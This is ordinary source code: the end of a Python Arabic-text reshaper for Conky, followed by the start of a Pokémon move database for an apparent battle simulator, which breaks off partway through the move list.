u'\u0643' : [u'\u0643', u'\uFED9', u'\uFEDB', u'\uFEDC', u'\uFEDA', 4],
u'\u0644' : [u'\u0644', u'\uFEDD', u'\uFEDF', u'\uFEE0', u'\uFEDE', 4],
u'\u0645' : [u'\u0645', u'\uFEE1', u'\uFEE3', u'\uFEE4', u'\uFEE2', 4],
u'\u0646' : [u'\u0646', u'\uFEE5', u'\uFEE7', u'\uFEE8', u'\uFEE6', 4],
u'\u0647' : [u'\u0647', u'\uFEE9', u'\uFEEB', u'\uFEEC', u'\uFEEA', 4],
u'\u0648' : [u'\u0648', u'\uFEED', u'\uFEED', u'\uFEEE', u'\uFEEE', 2],
u'\u0649' : [u'\u0649', u'\uFEEF', u'\uFEEF', u'\uFEF0', u'\uFEF0', 2],
u'\u0671' : [u'\u0671', u'\u0671', u'\u0671', u'\uFB51', u'\uFB51', 2],
u'\u064A' : [u'\u064A', u'\uFEF1', u'\uFEF3', u'\uFEF4', u'\uFEF2', 4],
u'\u066E' : [u'\u066E', u'\uFBE4', u'\uFBE8', u'\uFBE9', u'\uFBE5', 4],
u'\u06AA' : [u'\u06AA', u'\uFB8E', u'\uFB90', u'\uFB91', u'\uFB8F', 4],
u'\u06C1' : [u'\u06C1', u'\uFBA6', u'\uFBA8', u'\uFBA9', u'\uFBA7', 4],
u'\u06E4' : [u'\u06E4', u'\u06E4', u'\u06E4', u'\u06E4', u'\uFEEE', 2],
u'\u067E' : [u'\u067E', u'\uFB56', u'\uFB58', u'\uFB59', u'\uFB57', 4],
u'\u0698' : [u'\u0698', u'\uFB8A', u'\uFB8A', u'\uFB8A', u'\uFB8B', 2],
u'\u06AF' : [u'\u06AF', u'\uFB92', u'\uFB94', u'\uFB95', u'\uFB93', 4],
u'\u0686' : [u'\u0686', u'\uFB7A', u'\uFB7C', u'\uFB7D', u'\uFB7B', 4],
u'\u06A9' : [u'\u06A9', u'\uFB8E', u'\uFB90', u'\uFB91', u'\uFB8F', 4],
u'\u06CC' : [u'\u06CC', u'\uFEEF', u'\uFEF3', u'\uFEF4', u'\uFEF0', 4]
}
ARABIC_GLYPHS_LIST = [
[u'\u0622', u'\uFE81', u'\uFE81', u'\uFE82', u'\uFE82', 2],
[u'\u0623', u'\uFE83', u'\uFE83', u'\uFE84', u'\uFE84', 2],
[u'\u0624', u'\uFE85', u'\uFE85', u'\uFE86', u'\uFE86', 2],
[u'\u0625', u'\uFE87', u'\uFE87', u'\uFE88', u'\uFE88', 2],
[u'\u0626', u'\uFE89', u'\uFE8B', u'\uFE8C', u'\uFE8A', 4],
[u'\u0627', u'\u0627', u'\u0627', u'\uFE8E', u'\uFE8E', 2],
[u'\u0628', u'\uFE8F', u'\uFE91', u'\uFE92', u'\uFE90', 4],
[u'\u0629', u'\uFE93', u'\uFE93', u'\uFE94', u'\uFE94', 2],
[u'\u062A', u'\uFE95', u'\uFE97', u'\uFE98', u'\uFE96', 4],
[u'\u062B', u'\uFE99', u'\uFE9B', u'\uFE9C', u'\uFE9A', 4],
[u'\u062C', u'\uFE9D', u'\uFE9F', u'\uFEA0', u'\uFE9E', 4],
[u'\u062D', u'\uFEA1', u'\uFEA3', u'\uFEA4', u'\uFEA2', 4],
[u'\u062E', u'\uFEA5', u'\uFEA7', u'\uFEA8', u'\uFEA6', 4],
[u'\u062F', u'\uFEA9', u'\uFEA9', u'\uFEAA', u'\uFEAA', 2],
[u'\u0630', u'\uFEAB', u'\uFEAB', u'\uFEAC', u'\uFEAC', 2],
[u'\u0631', u'\uFEAD', u'\uFEAD', u'\uFEAE', u'\uFEAE', 2],
[u'\u0632', u'\uFEAF', u'\uFEAF', u'\uFEB0', u'\uFEB0', 2],
[u'\u0633', u'\uFEB1', u'\uFEB3', u'\uFEB4', u'\uFEB2', 4],
[u'\u0634', u'\uFEB5', u'\uFEB7', u'\uFEB8', u'\uFEB6', 4],
[u'\u0635', u'\uFEB9', u'\uFEBB', u'\uFEBC', u'\uFEBA', 4],
[u'\u0636', u'\uFEBD', u'\uFEBF', u'\uFEC0', u'\uFEBE', 4],
[u'\u0637', u'\uFEC1', u'\uFEC3', u'\uFEC4', u'\uFEC2', 4],
[u'\u0638', u'\uFEC5', u'\uFEC7', u'\uFEC8', u'\uFEC6', 4],
[u'\u0639', u'\uFEC9', u'\uFECB', u'\uFECC', u'\uFECA', 4],
[u'\u063A', u'\uFECD', u'\uFECF', u'\uFED0', u'\uFECE', 4],
[u'\u0641', u'\uFED1', u'\uFED3', u'\uFED4', u'\uFED2', 4],
[u'\u0642', u'\uFED5', u'\uFED7', u'\uFED8', u'\uFED6', 4],
[u'\u0643', u'\uFED9', u'\uFEDB', u'\uFEDC', u'\uFEDA', 4],
[u'\u0644', u'\uFEDD', u'\uFEDF', u'\uFEE0', u'\uFEDE', 4],
[u'\u0645', u'\uFEE1', u'\uFEE3', u'\uFEE4', u'\uFEE2', 4],
[u'\u0646', u'\uFEE5', u'\uFEE7', u'\uFEE8', u'\uFEE6', 4],
[u'\u0647', u'\uFEE9', u'\uFEEB', u'\uFEEC', u'\uFEEA', 4],
[u'\u0648', u'\uFEED', u'\uFEED', u'\uFEEE', u'\uFEEE', 2],
[u'\u0649', u'\uFEEF', u'\uFEEF', u'\uFEF0', u'\uFEF0', 2],
[u'\u0671', u'\u0671', u'\u0671', u'\uFB51', u'\uFB51', 2],
[u'\u064A', u'\uFEF1', u'\uFEF3', u'\uFEF4', u'\uFEF2', 4],
[u'\u066E', u'\uFBE4', u'\uFBE8', u'\uFBE9', u'\uFBE5', 4],
[u'\u06AA', u'\uFB8E', u'\uFB90', u'\uFB91', u'\uFB8F', 4],
[u'\u06C1', u'\uFBA6', u'\uFBA8', u'\uFBA9', u'\uFBA7', 4],
[u'\u067E', u'\uFB56', u'\uFB58', u'\uFB59', u'\uFB57', 4],
[u'\u0698', u'\uFB8A', u'\uFB8A', u'\uFB8A', u'\uFB8B', 2],
[u'\u06AF', u'\uFB92', u'\uFB94', u'\uFB95', u'\uFB93', 4],
[u'\u0686', u'\uFB7A', u'\uFB7C', u'\uFB7D', u'\uFB7B', 4],
[u'\u06A9', u'\uFB8E', u'\uFB90', u'\uFB91', u'\uFB8F', 4],
[u'\u06CC', u'\uFEEF', u'\uFEF3', u'\uFEF4', u'\uFEF0', 4]
]
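# location: 1 = isolated, 2 = initial, 3 = medial, 4 = final
# (see the ARABIC_GLYPHS layout above). Unknown characters pass through.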
def get_reshaped_glyph(target, location):
if target in ARABIC_GLYPHS:
return ARABIC_GLYPHS[target][location]
else:
return target
def get_glyph_type(target):
if target in ARABIC_GLYPHS:
return ARABIC_GLYPHS[target][5]
else:
return 2
def is_haraka(target):
return target in HARAKAT
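# Replace the standalone word Allah (alef-lam-lam-heh) with the single
# ligature glyph U+FDF2.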
def replace_jalalah(unshaped_word):
return re.sub(u'^\u0627\u0644\u0644\u0647$', u'\uFDF2', unshaped_word)
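# Fuse every lam + alef pair into the corresponding lam-alef ligature,
# skipping any harakat between them. The consumed alef is temporarily
# replaced by a space, which is stripped out at the end.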
def replace_lam_alef(unshaped_word):
list_word = list(unshaped_word)
letter_before = u''
for i in range(len(unshaped_word)):
if not is_haraka(unshaped_word[i]) and unshaped_word[i] != DEFINED_CHARACTERS_ORGINAL_LAM:
letter_before = unshaped_word[i]
if unshaped_word[i] == DEFINED_CHARACTERS_ORGINAL_LAM:
candidate_lam = unshaped_word[i]
lam_position = i
haraka_position = i + 1
while haraka_position < len(unshaped_word) and is_haraka(unshaped_word[haraka_position]):
haraka_position += 1
if haraka_position < len(unshaped_word):
if lam_position > 0 and get_glyph_type(letter_before) > 2:
lam_alef = get_lam_alef(list_word[haraka_position], candidate_lam, False)
else:
lam_alef = get_lam_alef(list_word[haraka_position], candidate_lam, True)
if lam_alef != '':
list_word[lam_position] = lam_alef
list_word[haraka_position] = u' '
return u''.join(list_word).replace(u' ', u'')
def get_lam_alef(candidate_alef, candidate_lam, is_end_of_word):
shift_rate = 1
reshaped_lam_alef = u''
if is_end_of_word:
shift_rate += 1
if DEFINED_CHARACTERS_ORGINAL_LAM == candidate_lam:
if DEFINED_CHARACTERS_ORGINAL_ALF_UPPER_MDD == candidate_alef:
reshaped_lam_alef = LAM_ALEF_GLYPHS[0][shift_rate]
if DEFINED_CHARACTERS_ORGINAL_ALF_UPPER_HAMAZA == candidate_alef:
reshaped_lam_alef = LAM_ALEF_GLYPHS[1][shift_rate]
if DEFINED_CHARACTERS_ORGINAL_ALF == candidate_alef:
reshaped_lam_alef = LAM_ALEF_GLYPHS[2][shift_rate]
if DEFINED_CHARACTERS_ORGINAL_ALF_LOWER_HAMAZA == candidate_alef:
reshaped_lam_alef = LAM_ALEF_GLYPHS[3][shift_rate]
return reshaped_lam_alef
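# Splits a word into regular letters and harakat while remembering their
# positions, so the harakat can be re-inserted after the letters alone
# have been reshaped.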
class DecomposedWord(object):
def __init__(self, word):
self.stripped_harakat = []
self.harakat_positions = []
self.stripped_regular_letters = []
self.letters_position = []
for i in range(len(word)):
c = word[i]
if is_haraka(c):
self.harakat_positions.append(i)
self.stripped_harakat.append(c)
else:
self.letters_position.append(i)
self.stripped_regular_letters.append(c)
def reconstruct_word(self, reshaped_word):
l = list(u'\0' * (len(self.stripped_harakat) + len(reshaped_word)))
for i in range(len(self.letters_position)):
l[self.letters_position[i]] = reshaped_word[i]
for i in range(len(self.harakat_positions)):
l[self.harakat_positions[i]] = self.stripped_harakat[i]
return u''.join(l)
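# Full per-word pipeline: jalalah ligature, lam-alef ligatures, strip
# harakat, reshape the remaining letters, then restore the harakat.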
def get_reshaped_word(unshaped_word):
unshaped_word = replace_jalalah(unshaped_word)
unshaped_word = replace_lam_alef(unshaped_word)
decomposed_word = DecomposedWord(unshaped_word)
result = u''
if decomposed_word.stripped_regular_letters:
result = reshape_it(u''.join(decomposed_word.stripped_regular_letters))
return decomposed_word.reconstruct_word(result)
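# Select a contextual form for each letter: a letter joins forward only
# if it is itself a 4-form (connecting) letter and is not word-final,
# and joins backward only if the preceding letter is a 4-form letter.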
def reshape_it(unshaped_word):
if not unshaped_word:
return u''
if len(unshaped_word) == 1:
return get_reshaped_glyph(unshaped_word[0], 1)
reshaped_word = []
for i in range(len(unshaped_word)):
before = False
after = False
if i == 0:
after = get_glyph_type(unshaped_word[i]) == 4
elif i == len(unshaped_word) - 1:
before = get_glyph_type(unshaped_word[i - 1]) == 4
else:
after = get_glyph_type(unshaped_word[i]) == 4
before = get_glyph_type(unshaped_word[i - 1]) == 4
if after and before:
reshaped_word.append(get_reshaped_glyph(unshaped_word[i], 3))
elif after and not before:
reshaped_word.append(get_reshaped_glyph(unshaped_word[i], 2))
elif not after and before:
reshaped_word.append(get_reshaped_glyph(unshaped_word[i], 4))
elif not after and not before:
reshaped_word.append(get_reshaped_glyph(unshaped_word[i], 1))
return u''.join(reshaped_word)
def is_arabic_character(target):
return target in ARABIC_GLYPHS or target in HARAKAT
def get_words(sentence):
if sentence:
return re.split('\\s', sentence)
return []
def has_arabic_letters(word):
for c in word:
if is_arabic_character(c):
return True
return False
def is_arabic_word(word):
for c in word:
if not is_arabic_character(c):
return False
return True
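# Split a word that mixes Arabic and non-Arabic characters into maximal
# runs of a single kind, so each run can be reshaped (or left) separately.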
def get_words_from_mixed_word(word):
temp_word = u''
words = []
for c in word:
if is_arabic_character(c):
if temp_word and not is_arabic_word(temp_word):
words.append(temp_word)
temp_word = c
else:
temp_word += c
else:
if temp_word and is_arabic_word(temp_word):
words.append(temp_word)
temp_word = c
else:
temp_word += c
if temp_word:
words.append(temp_word)
return words
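# Public entry point: reshape the text line by line, preserving newlines.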
def reshape(text):
if text:
lines = re.split('\\r?\\n', text)
for i in range(len(lines)):
lines[i] = reshape_sentence(lines[i])
return u'\n'.join(lines)
return u''
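# Reshape each word, then reverse the whole sentence character by
# character, presumably because the target renderer (Conky, per this
# repo) draws strictly left-to-right and has no bidi support.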
def reshape_sentence(sentence):
    words = get_words(sentence)
    # initialized before the loop so empty sentences return u'' instead
    # of raising NameError at the final return
    RTL = u''
    for i in range(len(words)):
        word = words[i]
if has_arabic_letters(word):
if is_arabic_word(word):
words[i] = get_reshaped_word(word)
else:
mixed_words = get_words_from_mixed_word(word)
for j in range(len(mixed_words)):
mixed_words[j] = get_reshaped_word(mixed_words[j])
words[i] = u''.join(mixed_words)
for letter in u' '.join(words):
RTL= letter + RTL
return RTL
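# Minimal usage sketch (module path per this repo: conkyar/arabic_reshaper.py):
#   >>> print(reshape(u'\u0627\u0644\u0633\u0644\u0627\u0645'))
# yields the glyph-substituted, pre-reversed string, ready for a renderer
# that lacks an Arabic shaping engine.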
| faisal-oead/conky-arabic-support | conkyar/arabic_reshaper.py | Python | gpl-2.0 | 13,842 | ["VisIt"] | 5946efabd65c3e1e11945f0af410f9dd63f33c4f567ab4deb0986b4962c066c6 |
from moves import DamagingMove
from moves import Move
from moves import BoostingMove
from moves import HealingMove
from handlers import *
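# Move database. Conventions as read from the data itself:
# - power and priority follow the games' values; accuracy is a fraction.
# - accuracy=0.0 appears to mark moves that bypass the accuracy check
#   (e.g. Aerial Ace, Aura Sphere), not moves that always miss.
# - "Noop" looks like a placeholder move with no effect.
# - handler=/power_handler= attach callbacks (pulled in by the wildcard
#   import from handlers above) for moves with side effects or computed
#   power.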
moves = {
"Noop": Move("Noop"),
"Absorb": DamagingMove("Absorb",
power=20,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Acid": DamagingMove("Acid",
power=40,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Acid Armor": BoostingMove("Acid Armor",
category="Non-Damaging",
type="Poison",
boosts={
'pdef': 2
}
),
"Acid Spray": DamagingMove("Acid Spray",
power=40,
category="Special",
priority=0,
type="Poison",
accuracy=1.000000),
"Acrobatics": DamagingMove("Acrobatics",
power=55,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Acupressure": Move("Acupressure",
category="Non-Damaging",
type="Normal"),
"Aerial Ace": DamagingMove("Aerial Ace",
power=60,
category="Physical",
priority=0,
type="Flying",
accuracy=0.000000),
"Aeroblast": DamagingMove("Aeroblast",
power=100,
category="Special",
priority=0,
type="Flying",
accuracy=0.950000),
"After You": Move("After You",
category="Non-Damaging",
type="Normal"),
"Agility": BoostingMove("Agility",
category="Non-Damaging",
type="Psychic",
boosts={
'spe': 2
}),
"Air Cutter": DamagingMove("Air Cutter",
power=60,
category="Special",
priority=0,
type="Flying",
accuracy=0.950000),
"Air Slash": DamagingMove("Air Slash",
power=75,
category="Special",
priority=0,
type="Flying",
accuracy=0.950000),
"Ally Switch": Move("Ally Switch",
category="Non-Damaging",
type="Psychic"),
"Amnesia": BoostingMove("Amnesia",
category="Non-Damaging",
type="Psychic",
boosts={
'spdef': 2
}),
"Ancient Power": DamagingMove("Ancient Power",
power=60,
category="Special",
priority=0,
type="Rock",
accuracy=1.000000),
"Aqua Jet": DamagingMove("Aqua Jet",
power=40,
category="Physical",
priority=1,
type="Water",
accuracy=1.000000),
"Aqua Ring": Move("Aqua Ring",
category="Non-Damaging",
type="Water"),
"Aqua Tail": DamagingMove("Aqua Tail",
power=90,
category="Physical",
priority=0,
type="Water",
accuracy=0.900000),
"Arm Thrust": DamagingMove("Arm Thrust",
power=15,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Aromatherapy": Move("Aromatherapy",
category="Non-Damaging",
type="Grass",
handler=handle_aromatherapy),
"Aromatic Mist": Move("Aromatic Mist",
category="Non-Damaging",
type="Fairy"),
"Assist": Move("Assist",
category="Non-Damaging",
type="Normal"),
"Assurance": DamagingMove("Assurance",
power=60,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Astonish": DamagingMove("Astonish",
power=30,
category="Physical",
priority=0,
type="Ghost",
accuracy=1.000000),
"Attack Order": DamagingMove("Attack Order",
power=90,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Attract": Move("Attract",
category="Non-Damaging",
type="Normal"),
"Aura Sphere": DamagingMove("Aura Sphere",
power=80,
category="Special",
priority=0,
type="Fighting",
accuracy=0.000000),
"Aurora Beam": DamagingMove("Aurora Beam",
power=65,
category="Special",
priority=0,
type="Ice",
accuracy=1.000000),
"Autotomize": BoostingMove("Autotomize",
category="Non-Damaging",
type="Steel",
boosts={
'spe': 2
}
),
"Avalanche": DamagingMove("Avalanche",
power=60,
category="Physical",
priority=-4,
type="Ice",
accuracy=1.000000),
"Baby-Doll Eyes": Move("Baby-Doll Eyes",
category="Non-Damaging",
type="Fairy"),
"Barrage": DamagingMove("Barrage",
power=15,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Barrier": BoostingMove("Barrier",
category="Non-Damaging",
type="Psychic",
boosts={
'pdef': 2
}),
"Baton Pass": Move("Baton Pass",
category="Non-Damaging",
type="Normal"),
"Beat Up": DamagingMove("Beat Up",
power=0,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Belch": DamagingMove("Belch",
power=120,
category="Special",
priority=0,
type="Poison",
accuracy=0.900000),
"Belly Drum": Move("Belly Drum",
category="Non-Damaging",
type="Normal"),
"Bestow": Move("Bestow",
category="Non-Damaging",
type="Normal"),
"Bide": DamagingMove("Bide",
power=0,
category="Physical",
priority=1,
type="Normal",
accuracy=0.000000),
"Bind": DamagingMove("Bind",
power=15,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Bite": DamagingMove("Bite",
power=60,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Blast Burn": DamagingMove("Blast Burn",
power=150,
category="Special",
priority=0,
type="Fire",
accuracy=0.900000),
"Blaze Kick": DamagingMove("Blaze Kick",
power=85,
category="Physical",
priority=0,
type="Fire",
accuracy=0.900000),
"Blizzard": DamagingMove("Blizzard",
power=110,
category="Special",
priority=0,
type="Ice",
accuracy=0.700000),
"Block": Move("Block",
category="Non-Damaging",
type="Normal"),
"Blue Flare": DamagingMove("Blue Flare",
power=130,
category="Special",
priority=0,
type="Fire",
accuracy=0.850000),
"Body Slam": DamagingMove("Body Slam",
power=85,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Bolt Strike": DamagingMove("Bolt Strike",
power=130,
category="Physical",
priority=0,
type="Electric",
accuracy=0.850000),
"Bone Club": DamagingMove("Bone Club",
power=65,
category="Physical",
priority=0,
type="Ground",
accuracy=0.850000),
"Bone Rush": DamagingMove("Bone Rush",
power=25,
category="Physical",
priority=0,
type="Ground",
accuracy=0.800000),
"Bonemerang": DamagingMove("Bonemerang",
power=50,
category="Physical",
priority=0,
type="Ground",
accuracy=0.900000),
"Boomburst": DamagingMove("Boomburst",
power=140,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Bounce": DamagingMove("Bounce",
power=85,
category="Physical",
priority=0,
type="Flying",
accuracy=0.850000),
"Brave Bird": DamagingMove("Brave Bird",
power=120,
category="Physical",
priority=0,
type="Flying",
handler=handle_brave_bird,
accuracy=1.000000),
"Brick Break": DamagingMove("Brick Break",
power=75,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Brine": DamagingMove("Brine",
power=65,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Bubble": DamagingMove("Bubble",
power=40,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Bubble Beam": DamagingMove("Bubble Beam",
power=65,
category="Special",
priority=0,
type="Water",
accuracy=1.000000),
"Bug Bite": DamagingMove("Bug Bite",
power=60,
category="Physical",
priority=0,
type="Bug",
accuracy=1.000000),
"Bug Buzz": DamagingMove("Bug Buzz",
power=90,
category="Special",
priority=0,
type="Bug",
accuracy=1.000000),
"Bulk Up": BoostingMove("Bulk Up",
category="Non-Damaging",
type="Fighting",
boosts={
'patk': 1,
'pdef': 1
}),
"Bulldoze": DamagingMove("Bulldoze",
power=60,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Bullet Punch": DamagingMove("Bullet Punch",
power=40,
category="Physical",
priority=1,
type="Steel",
accuracy=1.000000),
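    # Bullet Seed's power below is pre-multiplied (25 * 1.5 * 3),
    # presumably to fold the multi-hit mechanic into one flat value
    # rather than simulating individual hits.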
"Bullet Seed": DamagingMove("Bullet Seed",
power=25 * 1.5 * 3,
category="Physical",
priority=0,
type="Grass",
accuracy=1.000000),
"Calm Mind": BoostingMove("Calm Mind",
category="Non-Damaging",
type="Psychic",
boosts={
'spatk': 1,
'spdef': 1
}),
"Camouflage": Move("Camouflage",
category="Non-Damaging",
type="Normal"),
"Captivate": Move("Captivate",
category="Non-Damaging",
type="Normal"),
"Celebrate": Move("Celebrate",
category="Non-Damaging",
type="Normal"),
"Charge": Move("Charge",
category="Non-Damaging",
type="Electric"),
"Charge Beam": DamagingMove("Charge Beam",
power=50,
category="Special",
priority=0,
type="Electric",
accuracy=0.900000),
"Charm": Move("Charm",
category="Non-Damaging",
type="Fairy"),
"Chatter": DamagingMove("Chatter",
power=65,
category="Special",
priority=0,
type="Flying",
accuracy=1.000000),
"Chip Away": DamagingMove("Chip Away",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Circle Throw": DamagingMove("Circle Throw",
power=60,
category="Physical",
priority=-6,
type="Fighting",
accuracy=0.900000),
"Clamp": DamagingMove("Clamp",
power=35,
category="Physical",
priority=0,
type="Water",
accuracy=0.850000),
"Clear Smog": DamagingMove("Clear Smog",
power=50,
category="Special",
priority=0,
type="Poison",
accuracy=0.000000),
"Close Combat": DamagingMove("Close Combat",
power=120,
category="Physical",
priority=0,
type="Fighting",
handler=handle_close_combat,
accuracy=1.000000),
"Coil": BoostingMove("Coil",
category="Non-Damaging",
type="Poison",
boosts={
'patk': 1,
'pdef': 1,
'acc': 1
}),
"Comet Punch": DamagingMove("Comet Punch",
power=18,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Confide": Move("Confide",
category="Non-Damaging",
type="Normal"),
"Confuse Ray": Move("Confuse Ray",
category="Non-Damaging",
type="Ghost"),
"Confusion": DamagingMove("Confusion",
power=50,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Constrict": DamagingMove("Constrict",
power=10,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Conversion": Move("Conversion",
category="Non-Damaging",
type="Normal"),
"Conversion 2": Move("Conversion 2",
category="Non-Damaging",
type="Normal"),
"Copycat": Move("Copycat",
category="Non-Damaging",
type="Normal"),
"Cosmic Power": BoostingMove("Cosmic Power",
category="Non-Damaging",
type="Psychic",
boosts={
'pdef': 1,
'spdef': 1
}),
"Cotton Guard": BoostingMove("Cotton Guard",
category="Non-Damaging",
type="Grass",
boosts={
'pdef': 3
}),
"Cotton Spore": Move("Cotton Spore",
category="Non-Damaging",
type="Grass"),
"Counter": DamagingMove("Counter",
power=0,
category="Physical",
priority=-5,
type="Fighting",
accuracy=1.000000),
"Covet": DamagingMove("Covet",
power=60,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Crabhammer": DamagingMove("Crabhammer",
power=100,
category="Physical",
priority=0,
type="Water",
accuracy=0.900000),
"Crafty Shield": Move("Crafty Shield",
category="Non-Damaging",
type="Fairy"),
"Cross Chop": DamagingMove("Cross Chop",
power=100,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.800000),
"Cross Poison": DamagingMove("Cross Poison",
power=70,
category="Physical",
priority=0,
type="Poison",
accuracy=1.000000),
"Crunch": DamagingMove("Crunch",
power=80,
category="Physical",
priority=0,
type="Dark",
accuracy=1.000000),
"Crush Claw": DamagingMove("Crush Claw",
power=75,
category="Physical",
priority=0,
type="Normal",
accuracy=0.950000),
"Crush Grip": DamagingMove("Crush Grip",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Curse": Move("Curse",
category="Non-Damaging",
type="Ghost"),
"Cut": DamagingMove("Cut",
power=50,
category="Physical",
priority=0,
type="Normal",
accuracy=0.950000),
"Dark Pulse": DamagingMove("Dark Pulse",
power=80,
category="Special",
priority=0,
type="Dark",
accuracy=1.000000),
"Dark Void": Move("Dark Void",
category="Non-Damaging",
type="Dark"),
"Dazzling Gleam": DamagingMove("Dazzling Gleam",
power=80,
category="Special",
priority=0,
type="Fairy",
accuracy=1.000000),
"Defend Order": BoostingMove("Defend Order",
category="Non-Damaging",
type="Bug",
boosts={
'pdef': 1,
'spdef': 1
}),
"Defense Curl": BoostingMove("Defense Curl",
category="Non-Damaging",
type="Normal",
boosts={
'pdef': 1
}),
"Defog": Move("Defog",
category="Non-Damaging",
type="Flying",
handler=handle_defog),
"Destiny Bond": Move("Destiny Bond",
category="Non-Damaging",
type="Ghost"),
"Detect": Move("Detect",
category="Non-Damaging",
type="Fighting"),
"Diamond Storm": DamagingMove("Diamond Storm",
power=100,
category="Physical",
priority=0,
type="Rock",
accuracy=0.950000),
"Dig": DamagingMove("Dig",
power=80,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Disable": Move("Disable",
category="Non-Damaging",
type="Normal"),
"Disarming Voice": DamagingMove("Disarming Voice",
power=40,
category="Special",
priority=0,
type="Fairy",
accuracy=0.000000),
"Discharge": DamagingMove("Discharge",
power=80,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Dive": DamagingMove("Dive",
power=80,
category="Physical",
priority=0,
type="Water",
accuracy=1.000000),
"Dizzy Punch": DamagingMove("Dizzy Punch",
power=70,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Doom Desire": DamagingMove("Doom Desire",
power=140,
category="Special",
priority=0,
type="Steel",
accuracy=1.000000),
"Double Hit": DamagingMove("Double Hit",
power=35,
category="Physical",
priority=0,
type="Normal",
accuracy=0.900000),
"Double Kick": DamagingMove("Double Kick",
power=30,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Double Slap": DamagingMove("Double Slap",
power=15,
category="Physical",
priority=0,
type="Normal",
accuracy=0.850000),
"Double Team": BoostingMove("Double Team",
category="Non-Damaging",
type="Normal",
boosts={
'eva': 1
}),
"Double-Edge": DamagingMove("Double-Edge",
power=120,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000),
"Draco Meteor": DamagingMove("Draco Meteor",
power=130,
category="Special",
priority=0,
type="Dragon",
handler=handle_draco_meteor,
accuracy=0.900000),
"Dragon Ascent": DamagingMove("Dragon Ascent",
power=120,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Dragon Breath": DamagingMove("Dragon Breath",
power=60,
category="Special",
priority=0,
type="Dragon",
accuracy=1.000000),
"Dragon Claw": DamagingMove("Dragon Claw",
power=80,
category="Physical",
priority=0,
type="Dragon",
accuracy=1.000000),
"Dragon Dance": BoostingMove("Dragon Dance",
category="Non-Damaging",
type="Dragon",
boosts={
'patk': 1,
'spe': 1
}),
"Dragon Pulse": DamagingMove("Dragon Pulse",
power=85,
category="Special",
priority=0,
type="Dragon",
accuracy=1.000000),
"Dragon Rage": DamagingMove("Dragon Rage",
power=0,
category="Special",
priority=0,
type="Dragon",
accuracy=1.000000),
"Dragon Rush": DamagingMove("Dragon Rush",
power=100,
category="Physical",
priority=0,
type="Dragon",
accuracy=0.750000),
"Dragon Tail": DamagingMove("Dragon Tail",
power=60,
category="Physical",
priority=-6,
type="Dragon",
accuracy=0.900000),
"Drain Punch": DamagingMove("Drain Punch",
power=75,
category="Physical",
priority=0,
type="Fighting",
accuracy=1.000000),
"Draining Kiss": DamagingMove("Draining Kiss",
power=50,
category="Special",
priority=0,
type="Fairy",
accuracy=1.000000),
"Dream Eater": DamagingMove("Dream Eater",
power=100,
category="Special",
priority=0,
type="Psychic",
accuracy=1.000000),
"Drill Peck": DamagingMove("Drill Peck",
power=80,
category="Physical",
priority=0,
type="Flying",
accuracy=1.000000),
"Drill Run": DamagingMove("Drill Run",
power=80,
category="Physical",
priority=0,
type="Ground",
accuracy=0.950000),
"Dual Chop": DamagingMove("Dual Chop",
power=40,
category="Physical",
priority=0,
type="Dragon",
accuracy=0.900000),
"Dynamic Punch": DamagingMove("Dynamic Punch",
power=100,
category="Physical",
priority=0,
type="Fighting",
accuracy=0.500000),
"Earth Power": DamagingMove("Earth Power",
power=90,
category="Special",
priority=0,
type="Ground",
accuracy=1.000000),
"Earthquake": DamagingMove("Earthquake",
power=100,
category="Physical",
priority=0,
type="Ground",
accuracy=1.000000),
"Echoed Voice": DamagingMove("Echoed Voice",
power=40,
category="Special",
priority=0,
type="Normal",
accuracy=1.000000),
"Eerie Impulse": Move("Eerie Impulse",
category="Non-Damaging",
type="Electric"),
"Egg Bomb": DamagingMove("Egg Bomb",
power=100,
category="Physical",
priority=0,
type="Normal",
accuracy=0.750000),
"Electric Terrain": Move("Electric Terrain",
category="Non-Damaging",
type="Electric"),
"Electrify": Move("Electrify",
category="Non-Damaging",
type="Electric"),
"Electro Ball": DamagingMove("Electro Ball",
power=0,
category="Special",
priority=0,
type="Electric",
accuracy=1.000000),
"Electroweb": DamagingMove("Electroweb",
power=55,
category="Special",
priority=0,
type="Electric",
accuracy=0.950000),
"Embargo": Move("Embargo",
category="Non-Damaging",
type="Dark"),
"Ember": DamagingMove("Ember",
power=40,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Encore": Move("Encore",
category="Non-Damaging",
type="Normal"),
"Endeavor": DamagingMove("Endeavor",
power=0,
category="Physical",
priority=0,
type="Normal",
accuracy=1.000000,
handler=handle_endeavor),
"Endure": Move("Endure",
category="Non-Damaging",
type="Normal"),
"Energy Ball": DamagingMove("Energy Ball",
power=90,
category="Special",
priority=0,
type="Grass",
accuracy=1.000000),
"Entrainment": Move("Entrainment",
category="Non-Damaging",
type="Normal"),
"Eruption": DamagingMove("Eruption",
power=150,
category="Special",
priority=0,
type="Fire",
accuracy=1.000000),
"Explosion": DamagingMove("Explosion",
power=250,
category="Physical",
